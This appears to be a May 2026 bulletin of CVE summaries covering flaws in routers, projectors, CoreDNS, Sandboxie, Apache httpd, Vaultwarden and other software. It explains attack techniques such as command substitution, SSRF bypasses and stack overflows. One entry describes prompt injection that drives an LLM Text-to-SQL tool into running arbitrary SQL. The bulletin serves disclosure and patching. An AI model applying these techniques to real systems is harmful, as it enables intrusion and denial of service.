| n/a--lwjson 1.8.1 | lwjson 1.8.1 contains an improper input validation vulnerability in the streaming JSON parser (lwjson_stream.c). The end-of-string detection logic incorrectly identifies escaped quote characters by only checking the immediately preceding character rather than counting consecutive backslashes, causing valid JSON strings ending with an escaped backslash (like "\\") to never terminate parsing. A remote attacker can send well-formed JSON to cause applications using lwjson_stream_parse() to hang indefinitely, resulting in denial of service. | 2026-05-08 | not yet calculated | CVE-2026-29975 | https://github.com/MaJerle/lwjson/tree/develop https://github.com/MaJerle/lwjson/blob/develop/lwjson/src/lwjson/lwjson_stream.c#L362-L364 https://gist.github.com/dwilliams27/b99fd41be5d6848691797042cbfc1103 |
| Optomausa[.]com-- Optoma CinemaX P2 | The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes Android Debug Bridge (ADB) on TCP port 5555 over the network without requiring authentication. The device is configured with ro.adb.secure=0, which disables RSA key verification. Additionally, a functional su binary exists at /system/xbin/su that grants root privileges without authentication. An attacker on the same network can connect to the device via ADB, obtain a shell, and escalate to root privileges, gaining complete control of the device. This allows extraction of stored WiFi credentials, installation of persistent malware, and access to all device data. | 2026-05-07 | not yet calculated | CVE-2026-30495 | https://whitelabel.org/security/2026-02-01-smart-projector/ |
| Optomausa[.]com-- Optoma CinemaX P2 | The Optoma CinemaX P2 projector (firmware TVOS-04.24.010.04.01, Android 8.0.0) exposes an HTTP API on TCP port 2345 that allows full unauthenticated remote control of the device. The API supports both reading configuration (74 endpoints) and writing/modifying settings including volume, mute, brightness, power, network protocols enable/disable (including TELNET), display modes, and other projector functions. Any device on the same network can control the projector without authentication. | 2026-05-07 | not yet calculated | CVE-2026-30496 | https://whitelabel.org/security/2026-02-01-smart-projector/ |
| owasp-modsecurity--ModSecurity | ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. Libmodsecurity is one component of the ModSecurity v3 project. A segmentation fault occurs when a rule using the t:hexDecode transformation inspects a query string parameter containing a single character. An attacker can exploit this to crash worker processes, causing a denial of service. Service resumes once the attack stops as worker processes recover from the segfault. All versions before 3.0.15 of libModSecurity3 are affected. This has been patched in version 3.0.15. | 2026-05-05 | not yet calculated | CVE-2026-30923 | https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-qrjc-3jpc-3h2g https://github.com/owasp-modsecurity/ModSecurity/releases/tag/v3.0.15 |
| www[.]alticelabs[.]com-- GR140DG/GR140IG router gateway | The ping diagnostic handler in /bin/httpd_clientside for ALTICE LABS / SFR France GR140DG and GR140IG fibre CPE/Router/Gateway, inserts unsanitized user input into a system() call, allowing authenticated remote attackers to execute arbitrary commands as root via crafted destAddr parameters using shell command substitution. | 2026-05-05 | not yet calculated | CVE-2026-31195 | http://altice.com http://gr140dg.com https://xerod.io/advisories/XEROD-2026-0001 |
| www[.]alticelabs[.]com-- GR140DG/GR140IG router gateway | The traceroute diagnostic handler in /bin/httpd_clientside for ALTICE LABS / SFR France GR140DG and GR140IG fibre CPE/Router/Gateway, inserts unsanitized user input into a system() call, allowing authenticated remote attackers to execute arbitrary commands as root via crafted destAddr parameters using shell command substitution. | 2026-05-05 | not yet calculated | CVE-2026-31196 | http://altice.com http://gr140dg.com https://xerod.ai/advisories/XEROD-2026-0002 |
| dani-garcia--vaultwarden | Vaultwarden is a Bitwarden-compatible server written in Rust. In versions 1.35.4 and earlier, the WebAuthn authentication flow in `validate_webauthn_login()` updates persistent credential metadata (1backup_eligible1 and 1backup_state flags1) based on unverified `authenticatorData` before signature validation is performed. An attacker who knows a user's password but cannot produce a valid WebAuthn signature can permanently modify the stored backup flags for that user's credential. If signature verification fails, the database update is not rolled back. This can result in a persistent denial of service of WebAuthn two-factor authentication for affected credentials. This issue has been fixed in version 1.35.5. | 2026-05-05 | not yet calculated | CVE-2026-31835 | https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-x7g7-cgx5-jhx2 https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.5 |
| Tunnelblick--Tunnelblick | Tunnelblick is an open source graphic user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix socket. The socket is configured with mode 0666, allowing any local user to connect. No authorization check is performed on the connecting client. The tunnelblick-helper process constructs a path to config.ovpn inside a user-controlled .tblk directory and reads it as root without symlink validation. An attacker can create a .tblk configuration with a symlinked config.ovpn pointing to any file and request tunnelblickd to read it. This issue has been fixed in versions 9.0beta02. | 2026-05-05 | not yet calculated | CVE-2026-31893 | https://github.com/Tunnelblick/Tunnelblick/security/advisories/GHSA-927j-vcjf-hq69 https://github.com/Tunnelblick/Tunnelblick/releases/tag/v9.0beta02 |
| sandboxie-plus--Sandboxie | Sandboxie is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, a local denial of service vulnerability exists in the Sandboxie kernel driver. An unprivileged process running inside a Standard Sandbox can send a malformed IOCTL to the \Device\SandboxieDriverApi driver, triggering an immediate kernel crash (BSOD). The vulnerability affects the Standard Sandbox configuration both with and without dropped administrator privileges, but does not affect the Security Hardened Sandbox configuration. This issue has been fixed in version 1.17.3. Users who cannot update can use the Security Hardened Sandbox configuration as a workaround. | 2026-05-05 | not yet calculated | CVE-2026-32603 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-vvf8-cf4j-v8fv https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.17.3 |
| ericmj--decimal | Uncontrolled Resource Consumption vulnerability in ericmj decimal allows unauthenticated remote Denial of Service. The decimal library does not bound the exponent on parsed input. Storing a decimal with a very large exponent (e.g. Decimal.new("1e1000000000")) is accepted without error. Subsequent calls to arithmetic functions (Decimal.add/2, Decimal.sub/2, Decimal.div/2), Decimal.to_string/2 with :normal or :xsd format, Decimal.to_integer/1, Decimal.round/3, or Decimal.compare/3 with a threshold allocate memory proportional to the exponent value, which can exhaust available memory and crash the BEAM VM. Any application that accepts user-supplied decimal input and subsequently performs arithmetic, rounding, conversion to integer, or string formatting on it is exposed. A single malicious request is sufficient to cause an out-of-memory crash. This issue affects decimal: from 0.1.0 before 3.0.0. | 2026-05-07 | not yet calculated | CVE-2026-32686 | https://github.com/ericmj/decimal/security/advisories/GHSA-rhv4-8758-jx7v https://cna.erlef.org/cves/CVE-2026-32686.html https://osv.dev/vulnerability/EEF-CVE-2026-32686 https://github.com/ericmj/decimal/commit/6a523f3a73b8c9974540e21c7aa88f1258bb35ae |
| phoenixframework--phoenix | Allocation of Resources Without Limits or Throttling vulnerability in phoenixframework phoenix allows a denial of service via the long-poll transport's NDJSON body handling. In 'Elixir.Phoenix.Transports.LongPoll':publish/4, when a POST request is received with Content-Type: application/x-ndjson, the request body is split on newline characters using String.split/2 with no limit on the number of resulting segments. An attacker can send a body consisting entirely of newline bytes, causing a 1:1 amplification into a list of empty binaries - a 1 MB body produces approximately one million list elements, an 8 MB body approximately 8.4 million. Each element is then walked by Enum.map, materializing another list of the same size. This exhausts BEAM memory and schedulers, crashing the node and terminating all active sessions. A session token required to reach the vulnerable endpoint is freely obtainable by any client via an unauthenticated GET request to the same URL with a matching Origin header, making this attack effectively unauthenticated. This issue affects phoenix: from 1.7.0 before 1.7.22 and 1.8.6. | 2026-05-05 | not yet calculated | CVE-2026-32689 | https://github.com/phoenixframework/phoenix/security/advisories/GHSA-628h-q48j-jr6q https://cna.erlef.org/cves/CVE-2026-32689.html https://osv.dev/vulnerability/EEF-CVE-2026-32689 https://github.com/phoenixframework/phoenix/commit/1a67c61ff9ce0a7711662ac7354861917a7c80f7 https://github.com/phoenixframework/phoenix/commit/912ea181fd247c21dbcc49fb97d0053b947d81bf |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction by intercepting the request and modifying the nick form-data parameter to rename any account, including the administrator account. This leads to unauthorized modification of a field intended to be immutable. | 2026-05-05 | not yet calculated | CVE-2026-32699 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-pp79-hqv6-vmc3 |
| HP, Inc--Samsung Print Service Plugin | Samsung Print Service Plugin for Android is potentially vulnerable to information disclosure when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities. | 2026-05-06 | not yet calculated | CVE-2026-3291 | https://support.hp.com/us-en/document/ish_14864662-14864690-16/hpsbgn04093 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-QUIC (DoQ) server can be driven into unbounded goroutine and memory growth by a remote client that opens many QUIC streams and sends only 1 byte per stream. When the worker pool is full, CoreDNS still spawns a goroutine per accepted stream to wait for a worker token. Additionally, active workers block indefinitely in io.ReadFull() with no per-stream read deadline, allowing an attacker to pin all workers by sending a single byte so the read blocks waiting for the second byte of the DoQ length prefix. This enables an unauthenticated remote attacker to cause memory exhaustion and OOM-kill. This issue has been fixed in version 1.14.3. No known workarounds exist. | 2026-05-05 | not yet calculated | CVE-2026-32934 | https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5 https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-HTTPS (DoH) GET path accepts oversized dns= query parameter values and performs URL query parsing, base64 decoding, and DNS message unpacking before rejecting the request. Unlike the POST path, which applies a bounded read via http.MaxBytesReader limited to 65536 bytes, the GET path has no equivalent size validation before expensive processing. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to force high CPU usage, large transient memory allocations, and elevated garbage-collection pressure, leading to denial of service. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-32936 | https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| Apache Software Foundation--Apache HTTP Server | A timing attack against mod_auth_digest in Apache HTTP Server 2.4.66 allows a bypass of Digest authentication by a remote attacker. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-33006 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | A NULL pointer dereference in the mod_authn_socache in Apache HTTP Server 2.4.66 and earlier allows an unauthenticated remote user to crash a child process in a caching forward proxy configuration. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-33007 | https://httpd.apache.org/security/vulnerabilities_24.html |
| lepture--mistune | In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive. | 2026-05-06 | not yet calculated | CVE-2026-33079 | https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25 |
| Cradle--e-commerce | Open redirection vulnerability in the latest demo version of the Cradle eCommerce platform. The vulnerability occurs in the login form endpoint, where the 'returnUrl' parameter allows redirection because the web application accepts a URL as a parameter without properly validating it. As a result, it is possible to redirect users from the legitimate website to external pages. An attacker could exploit this vulnerability to deceive users and redirect them from a trusted URL to a malicious one without their knowledge. | 2026-05-08 | not yet calculated | CVE-2026-3318 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cradle-e-commerce |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the tsig plugin can be bypassed on non-plain-DNS transports (DoT, DoH, DoH3, DoQ, and gRPC) because it trusts the transport writer's TsigStatus() instead of performing verification itself. The DoH and DoH3 writer's TsigStatus() always returns nil, the DoT server does not set TsigSecret on the dns.Server, and the DoQ and gRPC writers also unconditionally return nil. This allows an unauthenticated remote client to bypass TSIG-based authentication and access resources intended to be restricted behind a tsig require all policy. Plain DNS over TCP and UDP are not affected. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-33190 | https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| dataease--SQLBot | SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering or escaping, and the SQL extracted from the LLM response is executed against the database without validation or sanitization. An authenticated attacker can craft a malicious question to manipulate the LLM into generating and executing arbitrary SQL statements. When connected to a PostgreSQL data source, this can lead to remote code execution via COPY FROM PROGRAM. This issue has been fixed in version 1.7.1. | 2026-05-05 | not yet calculated | CVE-2026-33324 | https://github.com/dataease/SQLBot/security/advisories/GHSA-q2q6-gqqh-4xrx |
| dani-garcia--vaultwarden | Vaultwarden is a Bitwarden-compatible server written in Rust. In version 1.35.4 and earlier, the get_org_collections_details endpoint (GET /api/organizations/{org_id}/collections/details) is missing the has_full_access() authorization check that exists on the sibling get_org_collections endpoint. This allows any Manager-role user with accessAll=False and no collection assignments to retrieve the names, UUIDs, user-to-collection mappings, and group-to-collection mappings for all collections in the organization. This issue has been fixed in version 1.35.5. | 2026-05-05 | not yet calculated | CVE-2026-33420 | https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-jjxg-p3v6-52ww https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.5 |
| coredns--coredns | CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the transfer plugin can select the wrong ACL stanza when both a parent zone and a more-specific subzone are configured. The longestMatch() function in plugin/transfer/transfer.go uses a lexicographic string comparison instead of an actual longest-suffix match to select the winning zone. As a result, a permissive parent-zone transfer rule can override a restrictive subzone rule depending on zone name ordering (e.g., "example.org." > "a.example.org." lexicographically). This allows an unauthorized remote client to perform AXFR/IXFR for the subzone and retrieve its full zone contents. This issue has been fixed in version 1.14.3. | 2026-05-05 | not yet calculated | CVE-2026-33489 | https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3 https://github.com/coredns/coredns/releases/tag/v1.14.3 |
| Apache Software Foundation--Apache HTTP Server | HTTP response splitting vulnerability in multiple Apache HTTP Server modules with untrusted or compromised backend servers. This issue affects Apache HTTP Server: from through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-33523 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Open Notebook--Open Notebook | Lack of user input sanitisation in Open Notebook v1.8.3 allows the application user to execute Python code (and subsequently OS commands) on the docker container via Server-Side Template Injection (SSTI) for user-created transformations. | 2026-05-07 | not yet calculated | CVE-2026-33587 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-f35w-wx37-26q7 |
| Open Notebook--Open Notebook | Lack of user input validation in the file upload functionality of Open Notebook v1.8.3 allows the application user to create or modify files on the docker container via path traversal. | 2026-05-07 | not yet calculated | CVE-2026-33588 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-x4q2-89g5-594v |
| Open Notebook--Open Notebook | Lack of user input validation in the file upload functionality of Open Notebook v1.8.3 allows the application user to access local files content from the docker container via path traversal. | 2026-05-07 | not yet calculated | CVE-2026-33589 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-842v-h4cj-r646 |
| Go standard library--net | When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash. | 2026-05-07 | not yet calculated | CVE-2026-33811 | https://go.dev/issue/78803 https://go.dev/cl/767860 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4981 |
| golang.org/x/net--golang.org/x/net/http2 | When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0. | 2026-05-07 | not yet calculated | CVE-2026-33814 | https://go.dev/cl/761581 https://go.dev/cl/761640 https://go.dev/issue/78476 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4918 |
| Apache Software Foundation--Apache HTTP Server | Out-of-bounds Read vulnerability in mod_proxy_ajp of Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-33857 | https://httpd.apache.org/security/vulnerabilities_24.html |
| twentyhq--twenty | Twenty is an open source CRM built with NestJS (Node.js). In versions 1.18.0 and earlier, the SSRF protection in twenty-server's SecureHttpClientService can be bypassed using IPv4-mapped IPv6 addresses in URL IP literals. Node.js's URL parser normalizes IPv4-mapped IPv6 addresses to compressed hex form (e.g., ::ffff:169.254.169.254 becomes ::ffff:a9fe:a9fe), but the isPrivateIp utility only recognizes the dotted-decimal notation. As a result, the hex form passes the SSRF check unchecked. Additionally, the socket lookup validation event does not fire for IP literal addresses, bypassing the second validation layer. An authenticated user can reach any internal IP, including cloud metadata endpoints, to exfiltrate credentials such as IAM keys. | 2026-05-05 | not yet calculated | CVE-2026-33975 | https://github.com/twentyhq/twenty/security/advisories/GHSA-vrcj-hv2q-c58m |
| Apache Software Foundation--Apache HTTP Server | Improper Null Termination, Out-of-bounds Read vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-34032 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Buffer Over-read vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-34059 | https://httpd.apache.org/security/vulnerabilities_24.html |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a library for reading and writing spreadsheet files. In versions 1.30.2 and earlier, 2.0.0 through 2.1.14, 2.2.0 through 2.4.3, 3.3.0 through 3.10.3, and 4.0.0 through 5.5.0, when the filename argument to IOFactory::load() is user-controlled, an attacker can supply a PHP stream wrapper path (such as phar://, ftp://, or ssh2.sftp://) that passes the is_file() check in File::assertFile(). The phar:// wrapper triggers deserialization of the PHAR metadata, which can lead to remote code execution if a suitable gadget chain is available in the application. The ftp:// and ssh2.sftp:// wrappers can be used for server-side request forgery. This issue has been fixed in versions 1.30.3, 2.1.15, 2.4.4, 3.10.4, and 5.6.0. | 2026-05-05 | not yet calculated | CVE-2026-34084 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q4q6-r8wh-5cgh |
| www[.]gambio[.]com--Gambio 4.9.2.0 | An issue was discovered in Gambio 4.9.2.0 (patched in 2024-02 v1.0.0 for GX4 v4.0.0.0 to v4.9.2.0). The password reset function can be bypassed to set arbitrary passwords for arbitrary accounts if the ID is known. | 2026-05-05 | not yet calculated | CVE-2026-34408 | https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/ https://herolab.usd.de/security-advisories/usd-2024-0002/ |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, an INI injection vulnerability allows any standard local user to bypass configuration restrictions (EditAdminOnly and ConfigPassword) and inject arbitrary directives into the global Sandboxie.ini configuration file. The background service skips authorization checks for IPC messages targeting sections beginning with UserSettings_, but does not sanitize CRLF characters in either the value parameter (via MSGID_SBIE_INI_ADD_SETTING) or the setting name parameter (via MSGID_SBIE_INI_SET_SETTING). An attacker can inject a new sandbox section header with unrestricted permissions, enabling sandbox escape and SYSTEM privilege escalation. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34458 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-6xqg-2cjq-95qf https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.17.3 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, the SbieSvc proxy service's GetRawInputDeviceInfoSlave handler contains two vulnerabilities that can be chained for sandbox escape. First, when a sandboxed process sends an IPC request with cbSize set to 0, up to 32KB of uninitialized stack memory from the service process is returned, leaking return addresses and stack cookies which bypass ASLR and /GS protections. Second, the handler performs a memcpy with an attacker-controlled length without verifying it fits within the 32KB stack buffer, enabling a stack buffer overflow. By chaining the information leak with the overflow, a sandboxed process can execute a ROP chain to achieve SYSTEM privilege escalation, even from a Security Hardened Sandbox. Hardware-enforced shadow stacks (Intel CET) prevent the ROP chain execution but do not mitigate the information leak. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34459 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-7cpc-5hv7-rfmh |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, the SbieIniServer RunSbieCtrl handler contains a stack buffer overflow. The MSGID_SBIE_INI_RUN_SBIE_CTRL message is handled before normal sandbox and impersonation checks, and for non-sandboxed callers, the handler copies the trailing message payload into a fixed-size WCHAR ctrlCmd[128] stack buffer using memcpy without verifying the length fits within the buffer. The service pipe is created with a NULL DACL, allowing any local interactive process to connect and send an oversized payload to overflow the stack. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34461 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-wpjw-jh2p-gwx7 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, several ProcessServer handlers (KillAllHandler, SuspendAllHandler, and RunSandboxedHandler) copy a WCHAR boxname[34] field from request structures into WCHAR[40] stack buffers using wcscpy without verifying null termination. Because the service pipe accepts variable-length packets larger than the request structure, an attacker can fill the boxname field with non-zero data and append additional controlled wide characters after the structure. wcscpy then reads past the fixed field and overflows the destination stack buffer. The service pipe is created with a NULL DACL, allowing any local process to connect, and the unsafe copy occurs before authorization checks. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34462 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-9cjg-vh9m-hhx4 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, NamedPipeServer::OpenHandler copies the server field from NAMED_PIPE_OPEN_REQ into a fixed WCHAR pipename[160] stack buffer using wcscat without verifying null termination. The handler only enforces a minimum packet size, and since the service pipe accepts variable-length messages, a sandboxed caller can fill the server[48] field with non-zero data and append additional controlled wide characters after the structure. wcscat then reads past the fixed field and overflows the stack buffer in the SYSTEM service. This message is restricted to sandboxed callers, making it a sandbox escape vector. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34464 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-cf8x-f33g-vwfg |
| www[.]zte[.]com--Routers H8102E, H168N, H167A, H199A and more | Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary. | 2026-05-06 | not yet calculated | CVE-2026-34473 | https://www.zte.com.cn/global/ https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9 |
| www[.]zte[.]com--Routers ZTE ZXHN H298A 1.1 and H108N 2.6 | Sensitive data exposure leading to admin/WLAN credential leak in ZTE ZXHN H298A 1.1 and H108N 2.6. A crafted request to the router web interface can expose sensitive device and account information. In affected builds, the response may include the administrator password and WLAN PSK, enabling authentication bypass and network compromise. Some firmware versions may expose only partial identifiers (e.g., serial number, ESSID, MAC addresses). | 2026-05-06 | not yet calculated | CVE-2026-34474 | https://www.zte.com.cn/global/ https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, SbieIniServer::HashPassword converts a SHA-1 digest to hexadecimal incorrectly. The high nibble of each byte is shifted right by 8 instead of 4, which always produces zero for an 8-bit value. As a result, the stored EditPassword hash only preserves the low nibble of each digest byte, reducing the effective entropy from 160 bits to 80 bits. This is layered on top of an unsalted SHA-1 scheme. The reduced entropy makes leaked or backed-up password hashes materially easier to brute-force. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34527 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w37h-qm9p-h4x2 |
| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, a Time-of-Check-to-Time-of-Use (TOCTOU) race condition exists during addon installation. When a user installs an addon through the SandMan interface, UpdUtil.exe is spawned as SYSTEM by SbieSvc but stages files in the user-writable %TEMP%\sandboxie-updater directory. After UpdUtil verifies file hashes against the signed addon manifest, install.bat extracts files.cab and executes config.exe from its contents. Between hash verification and extraction, an unprivileged user can replace files.cab with a crafted cabinet containing a malicious executable, which is then run as SYSTEM. No UAC prompt is required. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34596 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-xjvp-63f2-v585 |
| ASUS--ASUS System Control Interface | An Out-of-bounds Read vulnerability in the IOCTL handler in ASUS System Control Interface allows a local user to cause system crash (BSOD) via a read size that exceeds the buffer size.Refer to the ' Security Update for MyASUS ' section on the ASUS Security Advisory for more information. | 2026-05-08 | not yet calculated | CVE-2026-3508 | https://www.asus.com/security-advisory |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.5 and 5.2 before 5.2.14. Response headers do not vary on cookies if a session is not modified, but `SESSION_SAVE_EVERY_REQUEST` is `True`. A remote attacker can steal a user's session after that user visits a cached public page. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Cantina for reporting this issue. | 2026-05-05 | not yet calculated | CVE-2026-35192 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, a path traversal vulnerability in the REST API allows an authenticated user to escape the configured root_dir and access sibling directories whose names begin with the same prefix as the root_dir. For example, with a root_dir named "test", the API permits access to a sibling directory named "testtest" through a crafted request to the /api/contents endpoint using encoded path components. An attacker can read, write, and delete files in affected sibling directories. Multi-tenant deployments using predictable naming schemes are particularly at risk, as a user with a directory named "user1" could access directories for user10 through user19 and beyond. A user who can choose a single-character folder name could gain access to a significant number of sibling directories. Version 2.18.0 contains a fix. As a workaround, ensure folder names do not share a common prefix with any sibling directory. | 2026-05-05 | not yet calculated | CVE-2026-35397 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5789-5fc7-67v3 |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a library for reading and writing spreadsheet files. In versions 1.30.3 and earlier, 2.0.0 through 2.1.15, 2.2.0 through 2.4.4, 3.3.0 through 3.10.4, and 4.0.0 through 5.6.0, the HTML Writer skips htmlspecialchars() output escaping when a cell uses a custom number format containing the @ text placeholder with additional literal text (e.g., @ "items"). The escaping is only applied when the formatted output strictly equals the original cell value. When the format code contains @ with quoted literal text, the formatter substitutes the raw cell value into the format string and returns early without invoking the escaping callback. An attacker who can control cell content in a spreadsheet processed by the HTML Writer can inject arbitrary HTML and JavaScript into the generated output. This issue has been fixed in versions 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0. | 2026-05-05 | not yet calculated | CVE-2026-35453 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68 |
| lxc--incus | Incus is an open source container and virtual machine manager. In versions prior to 7.0.0, the image import flow issues an outbound HEAD request to a user-supplied URL before validating the request against project restrictions such as restricted.images.servers. The imgPostURLInfo function constructs and sends a HEAD request directly from the attacker-supplied source URL to resolve image metadata, and this network interaction occurs before the flow reaches the point where the import would be rejected by policy. Although the actual image download is blocked by the project restriction, an authenticated user can coerce the daemon into making blind HEAD requests to arbitrary destinations. These requests include server metadata in custom headers (Incus-Server-Architectures, Incus-Server-Version), which discloses information about the host environment to the attacker-controlled endpoint. This blind SSRF primitive can be used to probe internal services, unroutable address space, or cloud metadata endpoints reachable from the host. This vulnerability pattern is similar to CVE-2026-24767. This issue has been fixed in version 7.0.0. | 2026-05-05 | not yet calculated | CVE-2026-35527 | https://github.com/lxc/incus/security/advisories/GHSA-8gw4-p4wq-4hcv https://github.com/lxc/incus/blob/v6.22.0/cmd/incusd/images.go |
